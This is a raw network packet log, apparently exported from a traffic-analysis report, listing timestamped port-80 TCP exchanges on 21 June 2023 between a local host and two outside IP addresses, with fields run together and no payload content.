                                                                                                  Jun 21, 2023 20:23:59.829520941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829539061 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.829539061 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.829539061 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.829541922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829565048 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829585075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829606056 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829627991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829648972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829668999 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829688072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.829688072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.829689026 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.829688072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.829688072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.829746008 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.831099987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.831124067 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.831144094 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.835222006 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.852931023 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.852963924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.852988958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853013992 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853039980 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853065968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853092909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853118896 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853142977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853169918 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853188038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853189945 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853190899 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853190899 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853212118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853296041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853319883 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853322029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853353977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853368998 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853413105 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853415966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853451014 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853477955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853508949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853530884 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853535891 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853564024 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853585005 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853590012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853630066 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853642941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853668928 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853694916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853722095 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853749037 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853749990 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853765965 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853805065 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853816032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853852987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853878975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853905916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853931904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.853972912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.853974104 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.854068995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854094982 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854121923 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854146957 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854204893 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.854204893 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.854336023 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.854545116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854609013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854634047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854660988 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854712963 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.854826927 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.854922056 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854948044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854975939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.854995012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855091095 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855117083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855160952 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855200052 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855226040 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855249882 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855277061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855277061 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855320930 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855324030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855350018 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855375051 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855410099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855410099 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855428934 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855454922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855480909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855506897 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855519056 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855545044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855560064 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855581999 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855619907 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855647087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855674028 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855700016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855726004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855751991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855751038 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855751038 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855751038 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855782032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855811119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855835915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855863094 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855864048 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855887890 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855914116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855938911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855964899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.855983019 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855983973 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.855993032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856019974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856048107 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856072903 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856097937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856123924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856148958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856177092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856184006 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.856184006 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.856184006 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.856201887 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856230021 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856256008 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856306076 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856306076 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.856333017 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856362104 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856388092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856442928 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856452942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.856452942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.856468916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.856519938 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.858539104 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.860404968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.860433102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.860460043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.860483885 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.860997915 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.877850056 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.877978086 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.878025055 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.878165007 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.879280090 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879404068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879466057 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879527092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879587889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879590988 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.879647970 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879709005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879770041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879781008 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.879829884 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879890919 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879951000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.879956961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.879956961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.880012035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880070925 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880074024 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.880131006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880218029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880306959 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880326986 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.880326986 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.880372047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880415916 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.880434990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880530119 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880594015 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880594969 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.880659103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880681992 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.880722046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880820990 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880884886 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.880945921 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881006002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881009102 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881069899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881131887 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881160021 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881162882 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.881181002 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881194115 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881256104 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881315947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881355047 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881376028 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881438017 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881496906 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881505966 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881506920 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881561995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881620884 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881664991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881721973 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881747007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881783962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881793976 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.881891966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881982088 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.881988049 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882040977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882101059 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882133961 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882210016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882292032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882380962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882406950 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882440090 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882499933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882544041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882602930 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882606030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882602930 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882679939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882685900 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882754087 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882811069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882867098 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.882867098 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882911921 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.882952929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883008003 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883063078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883119106 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883214951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883271933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883287907 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.883322954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883378029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883393049 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.883452892 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883485079 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.883547068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883637905 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883697987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883747101 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.883793116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883850098 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883869886 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.883905888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.883914948 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.883965969 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884021997 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884078979 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884140968 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884149075 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884150028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884205103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884284019 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884305954 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884345055 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884401083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884423971 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884459972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884516001 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884561062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884624958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884677887 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884682894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884741068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884802103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884824991 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884860992 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884917974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.884938955 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.884973049 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.885024071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.885034084 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.885077000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.885130882 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.885188103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.885243893 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.885314941 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.885504007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.885865927 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886107922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886164904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886220932 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886219978 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.886276007 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886303902 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.886332989 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886393070 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.886394978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886555910 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886615038 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.886934042 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.886995077 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.887048960 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.888051987 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:23:59.910532951 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910569906 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910597086 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910624027 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910651922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910691977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910720110 CEST804970445.9.74.80192.168.2.4
